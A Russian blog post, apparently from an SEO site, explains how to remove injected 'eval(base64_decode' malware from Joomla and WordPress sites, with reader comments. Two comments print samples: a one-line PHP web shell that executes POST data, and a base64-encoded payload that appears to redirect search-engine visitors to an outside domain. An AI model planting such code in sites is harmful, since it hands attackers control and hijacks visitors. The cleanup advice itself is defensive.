Удаляем заразу: niceseo vs вирус eval(base64_decode). 1:0

Привет, дорогие друзья!

Тема сегодня актуальная, т.к. бушует эпидемияна сайте обнаружился вирус, который напихал фразу «eval(base64_decode» в кучу файлов? Ерунда, ща niceseo разберётся! ;)

Ну, во-первых, немного предыстории.

Сначала сразу несколько клиентов жаловались на падение позиций сайта в поисковиках, как показал первичный анализ, появились непонятные вирусы на сайтах, а также, что Opera и любимый наш Яндекс «предупреждают об опасности на странице».

Затем Яндекс.Вебмастер стал мне слать письма о том, что и на моих личных сайтах также найден вирус.

Более тщательный анализ показал, зловредный код действительно имел место , и заключался он в функции:

и далее зашифрованный код.

Поэтому найти его очень просто, нужно поискать в файлах сайта строку «eval(base64_decode».

Поискали? Нашли дофигища файлов? У меня на одном сайте, например, обнаружилось почти 5000 файлов :) :

Да уж. Ладно бы файлов было там 10-20, ну даже 100, удалили бы вручную и всё, но проблем фо ми. Но нет, 4870 файлов, из которых надо удалить зловредный код.

Делаем следующим образов: Скачиваем программку Text Replacer, и дальше думаю всё понятно:

Всё, из файлов сайта вирус удалён. Заливаем бэкап обратно на хостинг.

Кстати, хинт: Текст Реплэйсер может и не найти почему-то файлы, тогда фразу по частям ищем)

Но на этом излечение не заканчивается, нужно еще сделать дамп мускульной базы данных, поискать там на всякий случай злосчастную фразу, и тоже удалить, если есть.

Теперь точно всё, зараза удалена. Но как не допустить, чтобы снова она появилась?

В моём случае, например, сторонних доступов по FTP не было, поэтому появился вирус либо из-за уязвимостей в Joomla, либо из-за неправильно выставленных прав на папки (CHMOD).

Поэтому, КРАЙНЕ ВАЖНО, провести следующие профилактические действия: просканировать сайт на данную ерунду, обновить джумлу и проверить доступы к файлам/папкам, иначе велик шанс не только заполучить кучу левых ссылок, а то и реально вирус у себя на сайте, но и выпадение сайта из индекса Яндекса, а насколько это плохо — тут и дураку понятно.

За сим всё, здоровой жизни вашим сайтам, без вирусов. С вами был linur, niceseo2.ru, до новых встреч!

Дополнение от нашего читателя: вирус также пихают нынче не только в php-файлы, но и в картинки! Будьте бдительны!)

Вирусы нужно уничтожать
Согласен!Удалять заразу!

Оцените статью!

5 (100%) всего голосов: 2

Понравилась статья? Поделиться с друзьями:
Комментариев: 25
  1. Ivanov Sergey

    Я еще сталкивался с eval(gzinflate(base64_decode…а вообще не думаю, что если встречается такой код, то это сразу вирус. могут и копирайты в такую ерунду кодировать =

  2. Аноним

    Спасибо огромное! Очень помогла статья. Убрал вирус с ВП. Видимо, не зря плагин Antivirus указывал на eval(base64_decode

    1. Аноним

      Рад помочь! надеюсь сайт у вас не выпал из яндекса хоть из-за вируса)

      1. Erick Rimer

        Кстати, а не удалось ли установить, откуда приходит малварь? ВП вроде всегда старался исправно обновлять.

        1. linur

          В моих случаях:
          1. Обычный троян утащил пароли к фтп из тотал коммандера
          2. Дырявые плагины к WordPress, так что будьте бдительны!

  3. Kds77

    согласен наверное в джумле есть дыра .. у меня так же на двух сайтах этой хрени много появилось..

  4. Lev196

    у меня тоже на сайте появилась такая зараза

  5. Lev196

    я удалил заразу а как защитить от нее а то через сутки опять появляется кто подскажет?

    1. Yura

      Посмотрите папку /images — есть ли там файл post.php

    2. 5093336

      Сегодня побеждал эту проблему на своем сайте и практически уверен, что то, что Вы написали не сработает т.к. распространитель заразы вы не нашли, а боролись только с последствиями. Попробуйте поискать вот такой код с него все начинается

      1. 5093336

        ?php if ($_POST[«php»]){eval(base64_decode($_POST[«php»]));exit;} ?

  6. Сергей Владимирович

    Большое спасибо! У меня заразилось 5 сайтов на одном хостинге. Думаю, или подобрали пароль к админке джумлы (на одном сайте стоял слишком простой) или к ФТП…
    На втором хостинге нет заражения, так что как повезет.
    В итоге зараза была в 7209 файлах, причем в некоторых по несколько раз.

  7. Rem!

    как любитель в подобных развлечений, могу сказать что такую штуку вшивают обычно в плагины, шаблоны, и прочее файлы сайта, которые вы качаете, советую еще смотреть функцию Exec тоже опасная) обычно как делают, в фанкшн скрипт который сует во все файлы этот эвал, ну и соответственно попадает на странице. Цель этого — вероятнее всего это получение холявных ссылок с вашего сайта, думаю не больше.
    PS это самое безобидная и распространенная хрень

  8. Rem!

    Кстати строку можно разкодировать и глянуть что там

    1. Imran

      а как разкодировать?

      1. Дербуш Олег

        http://base64.ru/

  9. Lev196

    я раскодирывал удалил все что связано с base64_decode

  10. Lev196

    и всеравно появился в других местах

  11. Imran

    ?php eval(base64_decode(«DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==»));

  12. Abstrat

    А можно ли эту программу (Text Replacer) или какую-нибудь другую использовать для уничтожения eval-заразы на сайтах, расположенных на сервере хостера?

    1. linur

      Вообще нет, нужно бэкап качать, потом заливать.
      Но для подобных нужд я скриптик писал (на php), могу помочь вам удалить заразу, но только если сам доступ к FTP получу

      1. Abstrat

        Беда в том, что удаленная зараза тут же восстанавливается, поэтому, пока не удавили источник, разовые мероприятия смысла не имеют — хоть как-то решала бы проблему программа, которую можно регулярно запускать и без особых хлопот очищать сайт на какое-то время.

        Я тут связался с разработчиками, они сказали, что такая возможность есть, если на сайте хостера создать виндовый диск. В cPanel есть такая опция как WebDisk, попробуем поискать счастья в этом направлении. Как Вы к этому относитесь?

        1. linur

          Ну да, но тем не менее, проблема таки серьезная, и лучше не откладывать, пока сайт из индекса Яндекса не выпал, например.

          Могу взяться за проблему полностью, на платной основе, могу просто скриптиком своим помочь :)

          Нужен именно FTP к директории с файлами сайта, Webdisk это другое немного.

          Вообще разговор уже выходит за рамки комментариев, пишите на e-mail niceseo@niceseo2.ru

  13. Erick Rimer

    Большое спасибо автору! В чем суть проблемы знал, но не знал чем вычистить. Еще одна утилитка в набор бедному разработчику. Спасибо!!!

    1. linur

      Вам спасибо :) Вычистим всю заразу общими усилиями :D

Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Для отправки сообщения выберите лишнее изображение